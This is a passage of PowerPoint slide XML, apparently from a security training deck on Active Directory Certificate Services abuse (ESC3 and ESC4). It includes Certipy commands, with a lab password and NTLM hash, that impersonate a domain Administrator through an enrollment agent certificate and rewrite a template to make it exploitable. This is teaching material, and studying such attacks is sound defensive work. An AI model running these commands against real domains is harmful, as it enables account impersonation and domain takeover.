            </a:br>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Agent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" dirty="0" err="1"/>
              <a:t>Templates</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Marcador de contenido 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="261764" y="2420888"/>
            <a:ext cx="7369621" cy="4267200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ESC3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is like ESC1 and ESC2 but abuses a different EKU and requires </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>an additional </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>step for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>abuse</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Enrollment Agents – users who are able to enroll for a certificate on behalf of another user.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The issued certificate from ESC3 vulnerable template allows to request another certificate on behalf of any user (it means that it is possible to impersonate any user).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Imagen 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8038628" y="2420888"/>
            <a:ext cx="3057952" cy="3505689"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3397676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b="1" dirty="0" smtClean="0"/>
              <a:t>ESC3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t> - Abuse</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Marcador de contenido 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="189756" y="1988840"/>
            <a:ext cx="12097343" cy="4111352"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>certificate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>based</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>on</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t> vulnerable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>certificate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>template</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0" smtClean="0"/>
              <a:t>ESC3:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1"/>
              <a:t>certipy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1"/>
              <a:t>req</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0"/>
              <a:t> '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1"/>
              <a:t>EvilCorp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0"/>
              <a:t>/TheHorseman:EvilCorp3.@EVILDC1.EvilCorp.local' -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1"/>
              <a:t>ca</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0"/>
              <a:t> 'EvilCorp-EVILDC1-CA' -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1"/>
              <a:t>template</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0"/>
              <a:t> 'Vulnerable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" smtClean="0"/>
              <a:t>ECS3‘</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" lvl="1">
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="▪"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" dirty="0" err="1"/>
              <a:t>Then</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" dirty="0"/>
              <a:t> use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" dirty="0" err="1"/>
              <a:t>Certificate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" dirty="0" err="1"/>
              <a:t>Request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" dirty="0" err="1"/>
              <a:t>Agent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" dirty="0" err="1"/>
              <a:t>certificate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" dirty="0"/>
              <a:t> (-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" dirty="0" err="1"/>
              <a:t>pfx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" dirty="0"/>
              <a:t>) to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" dirty="0" err="1"/>
              <a:t>request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" dirty="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" dirty="0" err="1"/>
              <a:t>certificate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" dirty="0" err="1"/>
              <a:t>on</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" dirty="0" err="1"/>
              <a:t>behalf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" dirty="0"/>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" dirty="0" err="1"/>
              <a:t>other</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" dirty="0" err="1"/>
              <a:t>another</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" dirty="0"/>
              <a:t> :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>certipy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>req</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>EvilCorp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>/TheHorseman:EvilCorp3.@EVILDC1.EvilCorp.local' -ca 'EvilCorp-EVILDC1-CA' -template 'User' -on-behalf-of '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>EvilCorp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>\Administrator' -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>pfx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>thehorseman.pfx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>' -out 'admin'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-ES" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1880492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b="1" dirty="0" smtClean="0"/>
              <a:t>ESC4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Vulnerable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Certificate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Template</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" dirty="0" smtClean="0"/>
              <a:t> Access Control</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Marcador de contenido 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="621804" y="1905000"/>
            <a:ext cx="7416824" cy="4267200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0"/>
              <a:t>Certificates</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0"/>
              <a:t>templates</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t> are AD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0"/>
              <a:t>objects</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t>, so </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0"/>
              <a:t>they</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0"/>
              <a:t>have</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0"/>
              <a:t>security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t> descriptor, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t> defines </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0"/>
              <a:t>which</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0"/>
              <a:t>permissiones</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t> AD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0"/>
              <a:t>principals</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0"/>
              <a:t>have</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0"/>
              <a:t>over</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0"/>
              <a:t>template</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0"/>
              <a:t>Weak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0"/>
              <a:t>permissions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0"/>
              <a:t>Excessive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t> Access </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0"/>
              <a:t>rights</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t>) can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0"/>
              <a:t>allow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t> non-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0"/>
              <a:t>privileged</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0"/>
              <a:t>users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0"/>
              <a:t>edit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0"/>
              <a:t>sensitive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0"/>
              <a:t>security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0"/>
              <a:t>settings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0"/>
              <a:t>template</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t> ( defines </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0"/>
              <a:t>EKUs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0"/>
              <a:t>allows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t> SAN, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0"/>
              <a:t>disable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t> manager </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0"/>
              <a:t>approval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t>), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0"/>
              <a:t>thereby</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0"/>
              <a:t>making</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0"/>
              <a:t>its</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t> vulnerable to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t> ESC1-3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0"/>
              <a:t>technique</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Imagen 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="981844" y="4943250"/>
            <a:ext cx="4608512" cy="1456628"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Imagen 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8110636" y="2065398"/>
            <a:ext cx="3315163" cy="4334480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3629668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b="1" dirty="0" smtClean="0"/>
              <a:t>ESC4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t> - Abuse</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Marcador de contenido 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="477788" y="1700808"/>
            <a:ext cx="11377264" cy="5157192"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>By default, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Certipy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> will overwrite the configuration to make it vulnerable to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>ESC1:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>certipy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>template </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>EvilCorp.local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" smtClean="0"/>
              <a:t>/TheHorseman:EvilCorp3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0"/>
              <a:t>.@EVILDC1.EvilCorp.local </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>-hashes :fc525c9683e8fe067095ba2ddc971889 -template </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>‘Vulnerable ESC4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>' -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>save-old</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="2000" dirty="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="2000" dirty="0" smtClean="0"/>
              <a:t>an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>specify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="2000" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>save-old</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>parameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="2000" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>save</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
